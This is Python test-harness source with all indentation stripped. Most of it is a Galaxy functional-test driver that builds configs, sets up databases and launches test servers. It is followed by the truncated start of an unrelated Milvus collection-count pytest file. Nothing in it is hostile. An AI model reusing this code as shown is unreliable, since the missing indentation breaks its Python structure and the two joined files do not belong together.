conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = f"{tool_conf},{shed_tool_conf}"
# Resolve these paths w.r.t. galaxy root; otherwise galaxy's config system will resolve them w.r.t.
# their parent directories, as per schema.
data_manager_config_file = _resolve_relative_config_paths(data_manager_config_file)
tool_config_file = _resolve_relative_config_paths(tool_conf)
tool_data_table_config_path = _resolve_relative_config_paths(tool_data_table_config_path)
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_path_paste=allow_path_paste,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
check_upload_content=False,
chunk_upload_size=100,
conda_prefix=conda_prefix,
conda_auto_init=conda_auto_init,
conda_auto_install=conda_auto_install,
cleanup_job=cleanup_job,
retry_metadata_internally=False,
data_dir=tmpdir,
data_manager_config_file=data_manager_config_file,
enable_beta_tool_formats=True,
expose_dataset_path=True,
ftp_upload_purge=False,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
id_secret='changethisinproductiontoo',
job_config_file=job_config_file,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
override_tempdir=False,
master_api_key=master_api_key,
running_functional_tests=True,
template_cache_path=template_cache_path,
template_path='templates',
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_parse_help=False,
tool_path=tool_path,
update_integrated_tool_panel=update_integrated_tool_panel,
use_tasked_jobs=True,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
webhooks_dir=TEST_WEBHOOKS_DIR,
logging=LOGGING_CONFIG_DEFAULT,
monitor_thread_join_timeout=5,
object_store_store_by="uuid",
simplified_workflow_run_ui="off",
strict_cwl_validation=False,
)
if default_shed_tool_data_table_config:
config["shed_tool_data_table_config"] = default_shed_tool_data_table_config
if not use_shared_connection_for_amqp:
config["amqp_internal_connection"] = f"sqlalchemy+sqlite:///{os.path.join(tmpdir, 'control.sqlite')}?isolation_level=IMMEDIATE"
config.update(database_conf(tmpdir, prefer_template_database=prefer_template_database))
config.update(install_database_conf(tmpdir, default_merged=default_install_db_merged))
if asbool(os.environ.get("GALAXY_TEST_USE_HIERARCHICAL_OBJECT_STORE")):
object_store_config = os.path.join(tmpdir, "object_store_conf.yml")
with open(object_store_config, "w") as f:
contents = """
type: hierarchical
backends:
- id: files1
type: disk
weight: 1
files_dir: "${temp_directory}/files1"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp1"
- type: job_work
path: "${temp_directory}/job_working_directory1"
- id: files2
type: disk
weight: 1
files_dir: "${temp_directory}/files2"
extra_dirs:
- type: temp
path: "${temp_directory}/tmp2"
- type: job_work
path: "${temp_directory}/job_working_directory2"
"""
contents_template = string.Template(contents)
expanded_contents = contents_template.safe_substitute(temp_directory=tmpdir)
f.write(expanded_contents)
config["object_store_config_file"] = object_store_config
if datatypes_conf is not None:
config['datatypes_config_file'] = datatypes_conf
if enable_tool_shed_check:
config["enable_tool_shed_check"] = enable_tool_shed_check
config["hours_between_check"] = 0.001
tool_dependency_dir = os.environ.get('GALAXY_TOOL_DEPENDENCY_DIR')
if tool_dependency_dir:
config["tool_dependency_dir"] = tool_dependency_dir
# Used by shed's twill dependency stuff
# TODO: read from Galaxy's config API.
os.environ["GALAXY_TEST_TOOL_DEPENDENCY_DIR"] = tool_dependency_dir or os.path.join(tmpdir, 'dependencies')
return config
def _resolve_relative_config_paths(config_option):
# If option is not None, split into paths, resolve each w.r.t. root, then rebuild as csv string.
if config_option is not None:
resolved = []
for path in config_option.split(','):
resolved.append(os.path.join(galaxy_root, path.strip()))
return ','.join(resolved)
def _tool_data_table_config_path(default_tool_data_table_config_path=None):
tool_data_table_config_path = os.environ.get('GALAXY_TEST_TOOL_DATA_TABLE_CONF', default_tool_data_table_config_path)
if tool_data_table_config_path is None:
# ... otherwise find whatever Galaxy would use as the default and
# the sample data for functional tests to that.
default_tool_data_config = 'lib/galaxy/config/sample/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml']:
if os.path.exists(tool_data_config):
default_tool_data_config = tool_data_config
test_tool_data_config = 'test/functional/tool-data/sample_tool_data_tables.xml'
tool_data_table_config_path = f'{default_tool_data_config},{test_tool_data_config}'
return tool_data_table_config_path
def nose_config_and_run(argv=None, env=None, ignore_files=None, plugins=None):
"""Setup a nose context and run tests.
Tests are specified by argv (defaulting to sys.argv).
"""
if env is None:
env = os.environ
if ignore_files is None:
ignore_files = []
if plugins is None:
plugins = nose.plugins.manager.DefaultPluginManager()
if argv is None:
argv = sys.argv
test_config = nose.config.Config(
env=os.environ,
ignoreFiles=ignore_files,
plugins=plugins,
)
# Add custom plugin to produce JSON data used by planemo.
test_config.plugins.addPlugin(StructuredTestDataPlugin())
test_config.configure(argv)
result = run(test_config)
success = result.wasSuccessful()
return success
def copy_database_template(source, db_path):
"""Copy a 'clean' sqlite template database.
From file or URL to specified path for sqlite database.
"""
db_path_dir = os.path.dirname(db_path)
if not os.path.exists(db_path_dir):
os.makedirs(db_path_dir)
if os.path.exists(source):
shutil.copy(source, db_path)
assert os.path.exists(db_path)
elif source.lower().startswith(("http://", "https://", "ftp://")):
try:
download_to_file(source, db_path)
except Exception as e:
# We log the exception but don't fail startup, since we can
# do all migration steps instead of downloading a template.
log.exception(e)
else:
raise Exception(f"Failed to copy database template from source {source}")
def database_conf(db_path, prefix="GALAXY", prefer_template_database=False):
"""Find (and populate if needed) Galaxy database connection."""
database_auto_migrate = False
check_migrate_databases = True
dburi_var = f"{prefix}_TEST_DBURI"
template_name = None
if dburi_var in os.environ:
database_connection = os.environ[dburi_var]
# only template if postgres - not mysql or sqlite
do_template = prefer_template_database and database_connection.startswith("p")
if do_template:
database_template_parsed = urlparse(database_connection)
template_name = database_template_parsed.path[1:] # drop / from /galaxy
actual_db = f"gxtest{''.join(random.choice(string.ascii_uppercase) for _ in range(10))}"
actual_database_parsed = database_template_parsed._replace(path=f"/{actual_db}")
database_connection = actual_database_parsed.geturl()
if not database_exists(database_connection):
# We pass by migrations and instantiate the current table
create_database(database_connection)
mapping.init('/tmp', database_connection, create_tables=True, map_install_models=True)
toolshed_mapping.init(database_connection, create_tables=True)
check_migrate_databases = False
else:
default_db_filename = f"{prefix.lower()}.sqlite"
template_var = f"{prefix}_TEST_DB_TEMPLATE"
db_path = os.path.join(db_path, default_db_filename)
if template_var in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
copy_database_template(os.environ[template_var], db_path)
database_auto_migrate = True
database_connection = f'sqlite:///{db_path}'
config = {
"check_migrate_databases": check_migrate_databases,
"database_connection": database_connection,
"database_auto_migrate": database_auto_migrate
}
if not database_connection.startswith("sqlite://"):
config["database_engine_option_max_overflow"] = "20"
config["database_engine_option_pool_size"] = "10"
if template_name:
config["database_template"] = template_name
return config
def install_database_conf(db_path, default_merged=False):
install_galaxy_database_connection: Optional[str]
if 'GALAXY_TEST_INSTALL_DBURI' in os.environ:
install_galaxy_database_connection = os.environ['GALAXY_TEST_INSTALL_DBURI']
elif asbool(os.environ.get('GALAXY_TEST_INSTALL_DB_MERGED', default_merged)):
install_galaxy_database_connection = None
else:
install_galaxy_db_path = os.path.join(db_path, 'install.sqlite')
install_galaxy_database_connection = f'sqlite:///{install_galaxy_db_path}'
conf = {}
if install_galaxy_database_connection is not None:
conf["install_database_connection"] = install_galaxy_database_connection
return conf
def database_files_path(test_tmpdir, prefix="GALAXY"):
"""Create a mock database/ directory like in GALAXY_ROOT.
Use prefix to default this if TOOL_SHED_TEST_DBPATH or
GALAXY_TEST_DBPATH is set in the environment.
"""
environ_var = f"{prefix}_TEST_DBPATH"
if environ_var in os.environ:
db_path = os.environ[environ_var]
else:
tempdir = tempfile.mkdtemp(dir=test_tmpdir)
db_path = os.path.join(tempdir, 'database')
return db_path
def _get_static_settings():
"""Configuration required for Galaxy static middleware.
Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
static_dir = os.path.join(galaxy_root, "static")
# TODO: these should be copied from config/galaxy.ini
return dict(
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join(static_dir, 'images', ''),
static_favicon_dir=os.path.join(static_dir, 'favicon.ico'),
static_scripts_dir=os.path.join(static_dir, 'scripts', ''),
static_style_dir=os.path.join(static_dir, 'style'),
static_robots_txt=os.path.join(static_dir, 'robots.txt'),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent to ``app_factory``."""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
global_conf.update(_get_static_settings())
return global_conf
def wait_for_http_server(host, port, sleep_amount=0.1, sleep_tries=150):
"""Wait for an HTTP server to boot up."""
# Test if the server is up
for _ in range(sleep_tries):
# directly test the app, not the proxy
conn = http.client.HTTPConnection(host, port)
try:
conn.request("GET", "/")
response = conn.getresponse()
if response.status == 200:
break
except OSError as e:
if e.errno not in [61, 111]:
raise
time.sleep(sleep_amount)
else:
template = "Test HTTP server on host %s and port %s did not return '200 OK' after 10 tries"
message = template % (host, port)
raise Exception(message)
def attempt_port(port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.bind(('', port))
sock.close()
return port
except OSError:
return None
def attempt_ports(port):
if port is not None:
return port
raise Exception(f"An existing process seems bound to specified test server port [{port}]")
else:
random.seed()
for _ in range(0, 9):
port = attempt_port(random.randint(8000, 10000))
if port:
port = str(port)
os.environ['GALAXY_WEB_PORT'] = port
return port
raise Exception(f"Unable to open a port between {8000} and {10000} to start Galaxy server")
def serve_webapp(webapp, port=None, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
server = None
port = attempt_ports(port)
server = httpserver.serve(webapp, host=host, port=port, start_loop=False)
t = threading.Thread(target=server.serve_forever)
t.start()
return server, port
def uvicorn_serve(app, port, host=None):
"""Serve the webapp on a recommend port or a free one.
Return the port the webapp is running on.
"""
import asyncio
from uvicorn.server import Server
from uvicorn.config import Config
access_log = False if 'GALAXY_TEST_DISABLE_ACCESS_LOG' in os.environ else True
config = Config(app, host=host, port=int(port), access_log=access_log)
server = Server(config=config)
def run_in_loop(loop):
try:
asyncio.set_event_loop(loop)
loop.run_until_complete(server.serve())
finally:
loop.close()
asyncio.set_event_loop(None)
log.info("Event loop for uvicorn closed")
loop = asyncio.new_event_loop()
t = threading.Thread(target=run_in_loop, args=(loop,))
t.start()
return server, port, t
def cleanup_directory(tempdir):
"""Clean up temporary files used by test unless GALAXY_TEST_NO_CLEANUP is set.
Also respect TOOL_SHED_TEST_NO_CLEANUP for legacy reasons.
"""
skip_cleanup = "GALAXY_TEST_NO_CLEANUP" in os.environ or "TOOL_SHED_TEST_NO_CLEANUP" in os.environ
if skip_cleanup:
log.info(f"GALAXY_TEST_NO_CLEANUP is on. Temporary files in {tempdir}")
return
try:
if os.path.exists(tempdir) and not skip_cleanup:
shutil.rmtree(tempdir)
except Exception:
pass
def setup_shed_tools_for_test(app, tmpdir, testing_migrated_tools, testing_installed_tools):
"""Modify Galaxy app's toolbox for migrated or installed tool tests."""
if testing_installed_tools:
# TODO: Do this without modifying app - that is a pretty violation
# of Galaxy's abstraction - we shouldn't require app at all let alone
# be modifying it.
tool_configs = app.config.tool_configs
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join(app.config.root, MIGRATED_TOOL_PANEL_CONFIG)
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove(relative_migrated_tool_panel_config)
for installed_tool_panel_config in INSTALLED_TOOL_PANEL_CONFIGS:
tool_configs.append(installed_tool_panel_config)
from galaxy import tools # delay import because this brings in so many modules for small tests # noqa: E402
app.toolbox = tools.ToolBox(tool_configs, app.config.tool_path, app)
def build_galaxy_app(simple_kwargs) -> GalaxyUniverseApplication:
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary and use load_app_properties so
Galaxy override variables are respected. Also setup "global" references
to sqlalchemy database context for Galaxy and install databases.
"""
log.info("Galaxy database connection: %s", simple_kwargs["database_connection"])
simple_kwargs['global_conf'] = get_webapp_global_conf()
simple_kwargs['global_conf']['__file__'] = "lib/galaxy/config/sample/galaxy.yml.sample"
simple_kwargs = load_app_properties(
kwds=simple_kwargs
)
# Build the Universe Application
app = GalaxyUniverseApplication(**simple_kwargs)
if not simple_kwargs.get("enable_celery_tasks"):
rebind_container_to_task(app)
log.info("Embedded Galaxy application started")
global galaxy_context
global install_context
galaxy_context = app.model.context
install_context = app.install_model.context
# Toolbox indexing happens via the work queue out of band recently, and,
# beyond potentially running async after tests execute doesn't execute
# without building a uwsgi app (app.is_webapp = False for this test kit).
# We need to ensure to build an index for the test galaxy app -- this is
# pretty fast with the limited toolset
app.reindex_tool_search()
return app
def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = f"{prefix}_TEST_HOST"
port_env_key = f"{prefix}_TEST_PORT"
port_random_env_key = f"{prefix}_TEST_PORT_RANDOM"
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
# Ignore the port environment variable, it wasn't explictly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
else:
os.environ['GALAXY_WEB_PORT'] = port
return host, port
def set_and_wait_for_http_target(prefix, host, port, sleep_amount=0.1, sleep_tries=150):
host_env_key = f"{prefix}_TEST_HOST"
port_env_key = f"{prefix}_TEST_PORT"
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
def __init__(self, name, host, port):
self.name = name
self.host = host
self.port = port
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class EmbeddedServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port, thread=None):
super().__init__(name, host, port)
self._app = app
self._server = server
self._thread = thread
@property
def app(self):
return self._app
def stop(self):
log.info(f"{threading.active_count()} threads were active before stopping embedded server")
if self._server is not None and hasattr(self._server, "server_close"):
log.info(f"Shutting down embedded {self.name} Paste server")
self._server.server_close()
log.info(f"Embedded web server {self.name} stopped")
if self._server is not None and hasattr(self._server, "shutdown"):
log.info(f"Shutting down embedded {self.name} uvicorn server")
self._server.should_exit = True
log.info(f"Embedded web server {self.name} stopped")
if self._thread is not None:
log.info("Stopping embedded server thread")
self._thread.join()
log.info("Embedded server thread stopped")
if self._app is not None:
log.info(f"Stopping application {self.name}")
self._app.shutdown()
log.info(f"Application {self.name} stopped.")
log.info(f"{threading.active_count()} active after stopping embedded server")
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super().__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
interactive_tool_defaults = {
"interactivetools_prefix": "interactivetool",
"interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
"interactivetools_enable": True
}
for key, value in interactive_tool_defaults.items():
if key not in config["galaxy"]:
config["galaxy"][key] = value
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path) as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
f"{host}:{port}",
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for path in sys.path:
uwsgi_command.append('--pythonpath')
uwsgi_command.append(path)
handle_uwsgi_cli_command = getattr(
config_object, "handle_uwsgi_cli_command", None
)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", ' '.join(shlex.quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(
p, name, host, port
)
port = attempt_ports(port)
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, sleep_tries=50)
log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_uvicorn(webapp_factory, prefix=DEFAULT_CONFIG_PREFIX, galaxy_config=None, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
port = attempt_ports(port)
gx_app = build_galaxy_app(galaxy_config)
gx_wsgi_webapp = webapp_factory(
galaxy_config['global_conf'],
app=gx_app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
from galaxy.webapps.galaxy.fast_app import initialize_fast_app
app = initialize_fast_app(gx_wsgi_webapp, gx_app)
server, port, thread = uvicorn_serve(app, host=host, port=port)
set_and_wait_for_http_target(prefix, host, port)
log.info(f"Embedded uvicorn web server for {name} started at {host}:{port}")
return EmbeddedServerWrapper(
gx_app, server, name, host, port, thread=thread
)
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
set_and_wait_for_http_target(prefix, host, port)
log.info(f"Embedded paste web server for {name} started at {host}:{port}")
return EmbeddedServerWrapper(
app, server, name, host, port
)
class TestDriver:
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
__test__ = False # Prevent pytest from discovering this class (issue #12071)
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = bool(os.environ.get('GALAXY_TEST_UWSGI', None))
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
if getattr(config_object, "use_uvicorn", USE_UVICORN):
self.else_use_uvicorn = True
else:
self.else_use_uvicorn = False
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
allow_tool_conf_override = getattr(config_object, "allow_tool_conf_override", True)
self.allow_tool_conf_override = allow_tool_conf_override
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if callable(galaxy_config):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
allow_path_paste=getattr(config_object, "allow_path_paste", False),
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False),
allow_tool_conf_override=self.allow_tool_conf_override,
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
elif self.else_use_uvicorn:
server_wrapper = launch_uvicorn(
lambda *args, **kwd: buildapp.app_factory(*args, wsgi_preflight=False, **kwd),
galaxy_config=galaxy_config,
config_object=config_object,
)
self.app = server_wrapper.app
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info(f"Functional tests will be run against external Galaxy server {server_wrapper.host}:{server_wrapper.port}")
self.server_wrappers.append(server_wrapper)
else:
log.info(f"Functional tests will be run against test managed Galaxy server {self.external_galaxy}")
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_admin_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
if resource_parameters is None:
resource_parameters = {}
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_admin_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters,
**kwd
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
|
test_collection_count.py | import pdb
import pytest
import logging
import itertools
from time import sleep
import threading
from multiprocessing import Process
from milvus import IndexType, MetricType
from utils import *
dim = 128
index_file_size = 10
add_time_interval = 3
tag = "1970-01-01"
nb = 6000
class TestCollectionCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")[1]) == "CPU":
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in cpu mode")
if request.param["index_type"] == IndexType.IVF_PQ:
pytest.skip("Skip PQ Temporary")
return request.param
def test_collection_rows_count(self, connect, collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(collection_name=collection, records=vectors)
connect.flush([collection])
status, res = connect.count_collection(collection)
assert res == nb
def test_collection_rows_count_partition(self, connect, collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection, create partition and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
status = connect.create_partition(collection, tag)
assert status.OK()
res = connect.add_vectors(collection_name=collection, records=vectors, partition_tag=tag)
connect.flush([collection])
status, res = connect.count_collection(collection)
assert res == nb
def test_collection_rows_count_multi_partitions_A(self, connect, collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection, create partitions and add vectors in it,
assert the value returned by count_collection method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
new_tag = "new_tag"
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
status = connect.create_partition(collection, tag)
status = connect.create_partition(collection, new_tag)
assert status.OK()
res = connect.add_vectors(collection_name=collection, records=vectors)
connect.flush([collection])
status, res = connect.count_collection(collection)
assert res == nb
def test_collection_rows_count_multi_partitions_B(self, connect, collection, add_vectors_nb):
'''
target: test collection rows_count is correct or not
method: create collection, create partitions and add vectors in one of the partitions,
assert the value returned by count_collection method is equal to length of vectors
